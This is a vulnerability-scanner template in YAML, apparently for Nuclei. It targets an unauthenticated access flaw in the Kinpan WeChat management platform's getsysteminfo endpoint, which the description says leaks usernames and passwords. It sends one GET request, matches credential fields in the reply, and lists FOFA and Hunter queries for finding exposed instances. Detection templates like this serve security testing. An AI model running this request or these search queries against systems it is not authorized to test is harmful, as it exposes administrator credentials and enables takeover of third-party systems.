id: kinpan-wechat-unauthorized-getsysteminfo

info:
  name: kinpan-wechat-unauthorized-getsysteminfo
  author: p1z
  severity: critical
  description: |
    金盘 微信管理平台 getsysteminfo 接口存在未授权访问漏洞，攻击者通过漏洞可以获取账号密码信息，获取后台管理员权限
  reference:
    https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/e48ba246197315d26acb2fda1ecad4cb420df633/docs/wiki/webapp/%E9%87%91%E7%9B%98/%E9%87%91%E7%9B%98%20%E5%BE%AE%E4%BF%A1%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getsysteminfo%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md
  metadata:
    fofa-query: title="微信管理后台" && icon_hash="116323821"
    hunter-query: web.title=="微信管理后台"
    verified: true
  tags: 2023,kinpan,unauthorized

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admin/weichatcfg/getsysteminfo"
    matchers:
      - type: word
        part: body
        words:
          - "username"
          - "password"